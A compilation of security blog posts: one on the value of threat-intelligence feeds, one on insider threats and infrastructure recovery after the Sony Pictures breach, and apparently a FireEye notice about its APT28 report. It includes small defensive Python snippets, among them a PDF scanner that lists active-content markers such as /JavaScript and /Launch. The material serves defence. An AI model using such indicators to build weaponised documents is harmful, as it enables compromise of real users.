Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and a complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not destroy its utility to the security organization. Take for example a low-maturity organization that is understaffed and relies heavily on network-based security devices to protect its assets. Incorporating a known-bad (IP reputation) feed into its currently deployed network security technologies may be more than a simple added layer of security. It may in fact be an evolution, but one that only a lower-maturity security organization can appreciate.
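As a sketch of that "added layer": consuming a reputation feed takes only a few lines, which is exactly why it suits an understaffed team. The feed below is a hypothetical sample of the JSON shape such vendors typically serve:

```python
import json

# A reputation feed is just data; its value comes from where you apply it.
# The feed below is a hypothetical sample, not a real vendor's data.
feed_json = '''
[
  {"ip": "203.0.113.5",  "category": "c2",      "last_seen": "2015-01-10"},
  {"ip": "198.51.100.7", "category": "scanner", "last_seen": "2015-01-12"}
]
'''

blocklist = {entry["ip"]: entry for entry in json.loads(feed_json)}

def check(ip: str) -> str:
    entry = blocklist.get(ip)
    if entry is None:
        return f"{ip}: no reputation data"
    return f"{ip}: listed ({entry['category']}, last seen {entry['last_seen']})"

print(check("203.0.113.5"))
print(check("192.0.2.1"))
```

Wired into a firewall or proxy policy, even this naive lookup raises the bar for commodity threats at near-zero analyst cost.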

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.

Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree that the marketing organizations of the big vendors (and the small ones, to be fair) have all but ruined the reputation of the phrase threat intelligence, I dare you to run a successful security program without understanding your threats and adversaries and still succeed at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.

So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people, which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw the baby out with the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats just because we're sick of hearing talking heads misuse and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it that; it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once your threat intelligence "feed" has these characteristics, you have significantly more than just an RSS feed. You have something that can act as a catalyst for a security program stuck in the '90s. Let's not let the pull to be snarky get the best of us and throw away a perfectly legitimate term. Instead, let's point out those who misuse and abuse the term and call them out for their disservice to our mission.

The Absolute Worst Case – 2 Examples of Security’s Black Swans

You know that saying "It just got real"? If you're an employee of Sony Pictures, it just got real. In a very, very bad way. There are reports that the entire Sony Pictures infrastructure is down -- computers, network, VPN and all -- and that there is no estimated time to restoration (ETR) in sight.

There are reports that highly sensitive information is being held for "ransom", if you can call it that, by the attackers. There is even some reporting that someone representing the attackers has contacted the tech media and disclosed that the way they were able to infiltrate so completely was through insider help. In other words, the barbarians were literally inside the castle walls.

If you work in enterprise security I don't need to explain to you how bad this is, or how thoroughly this type of compromise breaks every single contingency plan most companies (outside the government, defense space) have in place. This compromise, an "IT matter" as Sony Pictures' PR calls it, is epic levels of bad.

Definition of Black Swan event, for clarity:
"The black swan theory or theory of black swan events is a metaphor that describes an event that comes as a surprise, has a major effect, and is often inappropriately rationalized after the fact with the benefit of hindsight."
--Source: Wikipedia--

You can read some fantastic reporting on the issue here:

Although I truly do not envy those poor souls in Enterprise Security over at Sony Pictures, it's the broader implications of this kind of attack that seriously concern me. This isn't the first time we've seen this type of attack - where the attackers had complete and total access (allegedly) into the infrastructure of the enterprise. It won't be the last time. So can we learn something here, and take it with us going forward? I think we can, if we're willing to pay attention.

I'd like to pose a few hypothetical scenarios here, given the lesson we're learning again from this unfortunate case, and what can or should be done to avoid being, to put it mildly, thoroughly screwed.

Case- Insider Threat / Rogue Insider
Insider threats are the stuff of myth in much of enterprise security. We hear a lot about how dangerous they can be but it's rare that someone actually comes forward with a first-hand account. If this incident is truly an insider threat (rogue employee, aiding an outside attacker) then it will be a case used for years to illustrate the point.

Insiders hold a special place in the nightmares of enterprise security professionals. Mostly because much of our defenses are positioned at our borders so when someone who has access and is a trusted insider goes rogue we have very little recourse. This is the continuing problem we see as defenders - the M&Ms paradigm. Hard outer shell, soft chewy middle.

A lifetime ago, when I was leading up enterprise security engineering, our team had discussions about how we were going to protect ourselves against this type of threat. We knew we had malicious insiders in many places with deep access and deeper pockets, so rooting them out wasn't going to work. If you can't keep them out, then what's the next line of prevention? Maybe it's a little bit of 1990s technology like segmentation of network assets, separation of duties, and tight identity and access management controls. Beyond that, we profile people's behaviors and look to build operational baselines -- I know this is much easier said than done, no need to repeat it.

So what happens when prevention fails, often catastrophically and publicly? We turn to detection and response. Failure to prevent isn't failure, it's a fail in the kill chain, forcing us to move to the next step down. Detection, swiftly and silently, is the next big key. Again, if you don't know what normal looks like you will never know what abnormal deviation is, I hope that's intuitive. I've never known an attacker that gets caught by an IPS signature - mainly because there is no such thing. So again, what does detection look like? I think it comes down to detecting deviations (even if they're subtle) in behavioral patterns of humans and/or systems. I don't think you need to spend a million dollars to do it. Maybe it's enough to use Marcus Ranum's "never-seen-before" idea. Take key assets, and build access tables for who accesses, how frequently, and when. Then look for net-new access (even if it's legal/allowed) and investigate. Sure, you may technically have access to that HR share, but you really shouldn't be accessing it, and under normal conditions you wouldn't.
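Ranum's "never-seen-before" idea really is this simple at its core. A minimal sketch (the users and share paths are invented):

```python
from collections import defaultdict

# Minimal "never-seen-before" detector: keep a table of (user, asset)
# pairs and flag the first time a new pair appears -- even if the access
# is technically allowed, net-new access is worth a look.
seen = defaultdict(set)

def record_access(user: str, asset: str) -> bool:
    """Return True if this user has never touched this asset before."""
    novel = asset not in seen[user]
    seen[user].add(asset)
    return novel

log = [("alice", "\\\\fs01\\hr"),
       ("alice", "\\\\fs01\\hr"),   # repeat access: not novel
       ("bob",   "\\\\fs01\\hr")]   # bob's first touch: novel
alerts = [(u, a) for u, a in log if record_access(u, a)]
print(alerts)
```

In practice you would seed the table from a learning period first, so only genuinely new access after the baseline raises an alert.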

But what if the things you're stealing as an insider are the things you work with and have access to every day? Well, then we focus on exfiltration (deeper down the kill chain). How does data leave your environment? Can you prevent people from taking data out of your network, or at least catch them when they try? I'm fairly confident the answer is no if it's just a general question -- but if you can identify and tag, at some meta-level, the things that are truly critical to your organization, maybe you can detect when they are trying to leave the infrastructure without permission. I don't know the answer here, mainly because one answer isn't going to solve all of the problems out there; it's a "well, it depends" answer based on your company profile.

I can tell you this though, insider threats are models for using kill chain analysis.

Recovering from an insider is a little more difficult, particularly when you don't know who they are. Insiders can burrow deep, and stay hidden for a long time - sometimes going completely undiscovered. This means that if you're fairly sure you've been compromised by a malicious insider, but can't identify the attacker, you're in for a rough go at trying to figure out what state to restore to. Do you restore your network/infrastructure to 2 days ago? 2 weeks ago? 2 months ago? The answer is uncertain until you find and profile the attacker. Once you do, you're likely to discover that you can't trust much of your infrastructure telemetry if the attacker was well-hidden. Covering their tracks is something "advanced" adversaries are good at.

The things to think about here are two-fold. First, you need to identify and attribute the attack to someone, or a group. Post-haste. Yesterday speeds. You need to know who they are, so you can start tracing their steps and figure out what they did, when they did it, and the extent of the potential damage. If you can't figure this out quickly, getting the infrastructure to a working state may not do you any good, because it could still be compromised in that state, or could leave you open to another run at compromise further down the line, when you believe you've removed the threat.

Second, you need to restore services and bring back the business. Today many companies simply cease to exist without IT. If you want to degrade or destroy a company - take away their ability to network and communicate. The battle of service restoration versus security analysis will be bitter, and  you'll probably lose as the CISO. Restore services, and figure out what's going on, maybe in parallel, maybe not - but that first step is almost universal with the notable exception of a few industry segments where being secured is as critical as being online.

Case- Compromised Core Infrastructure
Nothing says you're about to have a bad day like the source of a major attack on your enterprise coming through your endpoint management infrastructure. This starts to feel a lot like an insider threat - although it doesn't necessarily have to be. I can't even imagine the horror of finding out that your endpoint patching and software delivery platform has been re-purposed to deliver malware to all of your endpoints and that it has been the focal point of your adversary's operations. If you can't trust your core infrastructure - what can you trust?

Perhaps trust is the wrong way to look at it, as my friend Steve Ragan pointed out. So what then?

Within the enterprise framework there has to be some piece of infrastructure that is trusted. Maybe it's a system that stays physically offline (off?) until it's critically needed with alternate credentials and operational parameters. Maybe it's a recovery platform that you have a known-good hash of so that you can quickly validate you're working with the genuine article. Maybe it's something else, but you have to have something to trust.

If you have a compromised core infrastructure, I think you're looking at one of two options. Option A is restoring your systems to a questionable state (not obviously compromised, and usable) and working backwards to find the intruder. Option B is shutting everything down, redeploying, and starting from scratch. Option B may well sound like the more sound option from a security perspective, until you factor in the actual data. Nothing says your data can't be compromised too; it's not just about Windows credentials. Maybe some of your company's top-secret documents are PDFs. Maybe the attacker was clever and trojaned all of your PDFs so that as soon as one is opened, the compromise starts all over again.
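As a triage aid during recovery, you can at least flag documents that declare active content. The sketch below is a naive, hypothetical heuristic (the marker list is an assumption, not a complete catalog of risky PDF features): it byte-scans for dictionary keys like /OpenAction and /JavaScript so flagged files can be quarantined for manual review. A custom implant can evade this trivially, which is exactly the point made next.

```python
# Naive triage heuristic, not real detection: flag PDFs that declare
# active-content features so they can be quarantined for manual review.
SUSPICIOUS_MARKERS = [
    b"/JavaScript",   # embedded script
    b"/OpenAction",   # action fired when the document opens
    b"/AA",           # additional (automatic) actions
    b"/Launch",       # launch an external program
    b"/EmbeddedFile", # attached payloads
]

def flag_pdf(path: str) -> list[str]:
    """Return the suspicious markers found in the raw bytes of a PDF."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [marker.decode() for marker in SUSPICIOUS_MARKERS if marker in data]
```

A result like `["/OpenAction", "/JavaScript"]` doesn't prove compromise; it just tells you which files to look at first when you have tens of thousands of them.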

I seriously doubt that would be detected, because it's likely custom-written code and won't pop up in all but the most sophisticated (dare I say "next-gen") detection tools.

My suggestion here? Start with the innermost critical components of your infrastructure, audit and reset credentials, and work your way out in concentric rings until you reach components you can actually get by without. This exercise should keep your operations teams busy for a while, and you can maybe even get a parallel incident response investigation going in the meantime. On the plus side, this gives you a tiny window in which to start building things better from the ashes. Or maybe not, since you'll be going at light speed plus 1 mph. This is, however, the only advice that makes sense. It's also the only advice I can give you that I have actually tried myself, and as painful as it sounds, believe me when I say that in real life it's significantly worse.
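The concentric-ring idea turns into a simple ordering problem once you have an asset inventory. Here is a minimal sketch with an entirely hypothetical inventory (the ring assignments and asset names are assumptions for illustration): ring 0 is the innermost trust anchor, and the reset plan walks outward from there.

```python
# Hypothetical inventory: ring 0 is the innermost trust anchor (identity,
# PKI); higher numbers are progressively more expendable.
INVENTORY = {
    0: ["domain-controllers", "certificate-authority"],
    1: ["endpoint-management", "backup-servers"],
    2: ["file-servers", "mail"],
    3: ["workstations", "guest-wifi"],
}

def reset_plan(inventory: dict[int, list[str]]) -> list[str]:
    """Work outward from the core: audit and reset inner rings first."""
    plan = []
    for ring in sorted(inventory):
        for asset in inventory[ring]:
            plan.append(f"ring {ring}: audit and credential reset for {asset}")
    return plan
```

The ordering matters: resetting workstation credentials before the domain controllers just means the attacker, still sitting in the core, re-harvests everything you changed.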

Before this post gets too long (or have we long since crossed that bridge?), I think it's safe to say that very few of you reading this are operationally prepared to handle this type of incident, where you've either got a malicious insider who has gone undetected and wreaked utter chaos, or core infrastructure compromised by an outsider, or both, if you've won the crap lottery. That's a problem, because this is our black swan. This is our version of hijacked planes flying into buildings. We know it's a possibility, but none of us have the resources to prepare, and let's face it: we have bigger problems. Except that these incidents are real. The black swan is real. It happens. Now what?

Does this adjust your worldview, or the risk model for your organization, somehow? If so, in what way? Will you start taking the insider threat more seriously as a result? Why or why not, and how? By my unscientific calculation, probably 0.05% of companies out there have the capital and the resources to pull off recovering from one of these black swan events with anything even resembling success. The rest of us in the enterprise? What do we do when the worst case happens?

I'm curious how you see things. Leave a comment here, or take the conversation to Twitter with the hashtag #DtSR, and let's talk about it. I think we can learn something from the horrendous situation Sony Pictures is living through right now; let's not waste a teachable moment for everyone, collectively, to get even a tiny bit better.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal in releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.